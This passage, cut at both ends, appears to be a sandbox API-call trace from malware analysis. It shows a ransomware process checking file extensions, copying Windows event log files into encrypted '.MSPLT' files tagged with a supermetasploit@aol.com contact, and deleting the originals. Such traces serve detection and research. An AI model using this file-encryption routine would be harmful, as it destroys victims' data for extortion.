lpString2=".evtx") returned -1 [0291.446] lstrlenW (lpString=".pdf") returned 4 [0291.446] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString=".xls") returned 4 [0291.446] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString=".xlsx") returned 5 [0291.447] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.447] lstrlenW (lpString=".ppt") returned 4 [0291.447] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.447] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.447] lstrlenW (lpString=".zip") returned 4 [0291.447] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.447] lstrlenW (lpString=".rar") returned 4 [0291.447] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.447] lstrlenW (lpString=".bz2") returned 4 [0291.447] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.447] lstrlenW (lpString=".7z") returned 3 [0291.447] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.447] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.447] lstrlenW (lpString=".dbf") returned 4 [0291.447] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.447] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.447] lstrlenW (lpString=".1cd") returned 4 [0291.447] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.447] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.447] lstrlenW (lpString=".jpg") returned 4 [0291.447] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.447] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.447] lstrlenW (lpString="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 53 [0291.448] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.448] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0291.448] CloseHandle (hObject=0x450) returned 1 [0291.448] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 0x20 [0291.448] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.448] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.449] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.449] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.449] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0291.450] GetLastError () returned 0x0 [0291.450] ReadFile (in: hFile=0x450, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.543] WriteFile (in: hFile=0x440, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.546] ReadFile (in: hFile=0x450, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.546] WriteFile (in: hFile=0x440, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x13e, lpOverlapped=0x0) returned 1 [0291.546] SetEndOfFile (hFile=0x440) returned 1 [0291.552] CloseHandle (hObject=0x440) returned 1 [0291.555] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.555] SetEndOfFile (hFile=0x450) returned 1 [0291.556] CloseHandle (hObject=0x450) returned 1 [0291.557] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.557] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 1 [0291.557] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.557] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.557] lstrlenW (lpString=".doc") returned 4 [0291.557] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.557] lstrlenW (lpString=".docx") returned 5 [0291.558] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.558] lstrlenW (lpString=".pdf") returned 4 [0291.558] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString=".xls") returned 4 [0291.558] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString=".xlsx") returned 5 [0291.558] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.558] lstrlenW (lpString=".ppt") returned 4 [0291.558] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.558] lstrlenW (lpString=".zip") returned 4 [0291.558] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString=".rar") returned 4 [0291.558] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString=".bz2") returned 4 [0291.558] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString=".7z") returned 3 [0291.558] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.558] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.558] lstrlenW (lpString=".dbf") returned 4 [0291.558] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.558] lstrlenW (lpString=".1cd") returned 4 [0291.558] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.558] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.558] lstrlenW (lpString=".jpg") returned 4 [0291.559] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.559] lstrlenW (lpString=".doc") returned 4 [0291.559] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString=".docx") returned 5 [0291.559] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.559] lstrlenW (lpString=".pdf") returned 4 [0291.559] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString=".xls") returned 4 [0291.559] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString=".xlsx") returned 5 [0291.559] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.559] lstrlenW (lpString=".ppt") returned 4 [0291.559] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.559] lstrlenW (lpString=".zip") returned 4 [0291.559] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString=".rar") returned 4 [0291.559] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString=".bz2") returned 4 [0291.559] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.559] lstrlenW (lpString=".7z") returned 3 [0291.559] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.560] lstrlenW (lpString=".dbf") returned 4 [0291.560] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.560] lstrlenW (lpString=".1cd") returned 4 [0291.560] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0291.560] lstrlenW (lpString=".jpg") returned 4 [0291.560] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.560] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.560] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 42 [0291.560] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.765] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0291.765] CloseHandle (hObject=0x450) returned 1 [0291.765] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 0x20 [0291.765] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.765] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.766] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.766] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.766] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0291.781] GetLastError () returned 0x0 [0291.782] ReadFile (in: hFile=0x450, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.790] WriteFile (in: hFile=0x420, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.793] ReadFile (in: hFile=0x450, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.793] WriteFile (in: hFile=0x420, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x128, lpOverlapped=0x0) returned 1 [0291.793] SetEndOfFile (hFile=0x420) returned 1 [0291.797] CloseHandle (hObject=0x420) returned 1 [0291.805] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.805] SetEndOfFile (hFile=0x450) returned 1 [0291.806] CloseHandle (hObject=0x450) returned 1 [0291.807] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.807] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 1 [0291.814] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.814] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.814] lstrlenW (lpString=".doc") returned 4 [0291.814] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString=".docx") returned 5 [0291.814] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.814] lstrlenW (lpString=".pdf") returned 4 [0291.814] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString=".xls") returned 4 [0291.814] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString=".xlsx") returned 5 [0291.814] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.814] lstrlenW (lpString=".ppt") returned 4 [0291.814] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.814] lstrlenW (lpString=".zip") returned 4 [0291.814] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString=".rar") returned 4 [0291.814] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString=".bz2") returned 4 [0291.814] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.814] lstrlenW (lpString=".7z") returned 3 [0291.814] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.815] lstrlenW (lpString=".dbf") returned 4 [0291.815] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.815] lstrlenW (lpString=".1cd") returned 4 [0291.815] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.815] lstrlenW (lpString=".jpg") returned 4 [0291.815] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.815] lstrlenW (lpString=".doc") returned 4 [0291.815] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString=".docx") returned 5 [0291.815] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.815] lstrlenW (lpString=".pdf") returned 4 [0291.815] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString=".xls") returned 4 [0291.815] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString=".xlsx") returned 5 [0291.815] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.815] lstrlenW (lpString=".ppt") returned 4 [0291.815] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.815] lstrlenW (lpString=".zip") returned 4 [0291.815] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.816] lstrlenW (lpString=".rar") returned 4 [0291.816] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.816] lstrlenW (lpString=".bz2") returned 4 [0291.816] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.816] lstrlenW (lpString=".7z") returned 3 [0291.816] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.816] lstrlenW (lpString=".dbf") returned 4 [0291.816] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.816] lstrlenW (lpString=".1cd") returned 4 [0291.816] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0291.816] lstrlenW (lpString=".jpg") returned 4 [0291.816] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.816] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.816] lstrlenW (lpString="Microsoft-Windows-Known Folders API Service.evtx") returned 48 [0291.816] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0291.822] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0291.822] CloseHandle (hObject=0x434) returned 1 [0291.822] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 0x20 [0291.822] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.828] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0291.828] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.828] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.828] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.845] GetLastError () returned 0x0 [0291.845] ReadFile (in: hFile=0x434, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.854] WriteFile (in: hFile=0x43c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.127] ReadFile (in: hFile=0x434, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.127] WriteFile (in: hFile=0x43c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x134, lpOverlapped=0x0) returned 1 [0292.127] SetEndOfFile (hFile=0x43c) returned 1 [0292.501] CloseHandle (hObject=0x43c) returned 1 [0292.513] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.513] SetEndOfFile (hFile=0x434) returned 1 [0292.515] CloseHandle (hObject=0x434) returned 1 [0292.515] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.515] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 1 [0292.516] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.516] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.516] lstrlenW (lpString=".doc") returned 4 [0292.516] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString=".docx") returned 5 [0292.516] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.516] lstrlenW (lpString=".pdf") returned 4 [0292.516] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString=".xls") returned 4 [0292.516] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString=".xlsx") returned 5 [0292.516] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.516] lstrlenW (lpString=".ppt") returned 4 [0292.516] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.516] lstrlenW (lpString=".zip") returned 4 [0292.516] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString=".rar") returned 4 [0292.516] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString=".bz2") returned 4 [0292.516] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.516] lstrlenW (lpString=".7z") returned 3 [0292.516] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.517] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.517] lstrlenW (lpString=".dbf") returned 4 [0292.517] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.517] lstrlenW (lpString=".1cd") returned 4 [0292.517] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.517] lstrlenW (lpString=".jpg") returned 4 [0292.517] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.517] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.517] lstrlenW (lpString=".doc") returned 4 [0292.517] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString=".docx") returned 5 [0292.517] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.517] lstrlenW (lpString=".pdf") returned 4 [0292.517] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString=".xls") returned 4 [0292.517] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString=".xlsx") returned 5 [0292.517] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.517] lstrlenW (lpString=".ppt") returned 4 [0292.517] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.517] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.517] lstrlenW (lpString=".zip") returned 4 [0292.517] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.518] lstrlenW (lpString=".rar") returned 4 [0292.518] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.518] lstrlenW (lpString=".bz2") returned 4 [0292.518] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.518] lstrlenW (lpString=".7z") returned 3 [0292.518] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.518] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.518] lstrlenW (lpString=".dbf") returned 4 [0292.518] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.518] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.518] lstrlenW (lpString=".1cd") returned 4 [0292.518] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.518] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0292.518] lstrlenW (lpString=".jpg") returned 4 [0292.518] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.518] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.518] lstrlenW (lpString="Microsoft-Windows-Ntfs%4Operational.evtx") returned 